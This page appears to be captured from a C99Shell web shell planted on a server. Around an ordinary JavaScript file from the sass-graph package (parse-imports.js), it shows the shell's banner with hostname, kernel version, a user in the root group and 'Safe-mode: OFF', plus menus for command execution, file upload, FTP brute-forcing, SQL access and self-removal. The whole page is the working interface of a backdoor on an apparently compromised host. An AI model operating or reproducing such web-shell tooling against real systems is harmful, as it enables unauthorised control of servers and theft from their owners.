!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/inventory.picotech.app/public_html/node_modules/sass-graph/   drwxr-xr-x
Free 28.32 GB of 117.98 GB (24%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     parse-imports.js (1.4 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
var tokenizer = require('scss-tokenizer');

function parseImports(content, isIndentedSyntax) {
  var tokens = tokenizer.tokenize(content);
  var results = [];
  var tmp = '';
  var inImport = false;
  var inParen = false;
  var prevToken = tokens[0];

  var i, token;
  for (i = 1; i < tokens.length; i++) {
    token = tokens[i];

    if (inImport && !inParen && token[0] === 'string') {
      results.push(token[1]);
    }
    else if (token[1] === 'import' && prevToken[1] === '@') {
      if (inImport && !isIndentedSyntax) {
        throw new Error('Encountered invalid @import syntax.');
      }

      inImport = true;
    }
    else if (inImport && !inParen && (token[0] === 'ident' || token[0] === '/')) {
      tmp += token[1];
    }
    else if (inImport && !inParen && (token[0] === 'space' || token[0] === 'newline')) {
      if (tmp !== '') {
        results.push(tmp);
        tmp = '';

        if (isIndentedSyntax) {
          inImport = false;
        }
      }
    }
    else if (inImport && token[0] === ';') {
      inImport = false;

      if (tmp !== '') {
        results.push(tmp);
        tmp = '';
      }
    }
    else if (inImport && token[0] === '(') {
      inParen = true;
      tmp = '';
    }
    else if (inParen && token[0] === ')') {
      inParen = false;
    }

    prevToken = token;
  }

  if (tmp !== '') {
    results.push(tmp);
  }

  return results;
}

module.exports = parseImports;

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--